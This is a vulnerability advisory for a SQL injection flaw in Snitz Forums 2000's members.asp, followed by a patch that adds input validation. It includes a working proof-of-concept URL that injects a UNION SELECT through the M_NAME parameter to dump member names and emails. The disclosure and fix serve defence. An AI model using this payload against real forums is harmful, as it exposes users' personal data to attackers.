COMMAND
	Snitz Forums 2000 remote SQL query manipulation vulnerability
SYSTEMS AFFECTED
	Snitz Forums 2000 version : 3.3,3.3.01,3.3.02,3.3.03
PROBLEM
	acemi posted :
	In members.asp page, when listing  the  members  with  a  criteria,  the
	input (M_NAME) is not checked  for  malicious  code.  As  a  result,  an
	attacker can add extra SELECT statement to  the  query  with  UNION  and
	he/she can view any data in the forum's database.
	 Proof-of-concept
	 ----------------
	Normally, to view the members' list whose  membername  start  with  'A',
	members.asp page is used as the following:
	
	/members.asp?
	mode=search&M_NAME=A&initial=1&method=
	
	Use this link to view the vulnerability:
	
	/members.asp?mode=search&M_NAME=XXXX%
	25')%20UNION%20SELECT%20MEMBER_ID,%
	20M_STATUS,%20M_NAME%20%2B%20'/'%20%
	2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,%
	20M_EMAIL,%20M_COUNTRY,%
	20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%
	20M_AIM,%20M_TITLE,%20M_POSTS,%
	20M_LASTPOSTDATE,%20M_LASTHEREDATE,%
	20M_DATE,%20M_STATE%20FROM%
	20FORUM_MEMBERS%20WHERE%20(M_NAME%
	20LIKE%20'&initial=1&method=
	
	MEMBERNAME column will be MEMBERNAME/EMAIL/ column.
SOLUTION
	To fix this bug, in members.asp , change the following lines :
	
	SearchName = Request("M_NAME")
	if SearchName = "" then
	SearchName = Request.Form("M_NAME")
	end if
	
	with :
	
	if IsValidString(Request("M_NAME")) then
	SearchName = Request("M_NAME")
	end if
	if SearchName = "" then
	if IsValidString(Request.Form("M_NAME")) then
	SearchName = Request.Form("M_NAME")
	end if
	end if
	
	and in function IsValidString(sValidate) in inc_functions.asp  ,  change
	the following line:
	
	sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<"
	
	with :
	
	sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'"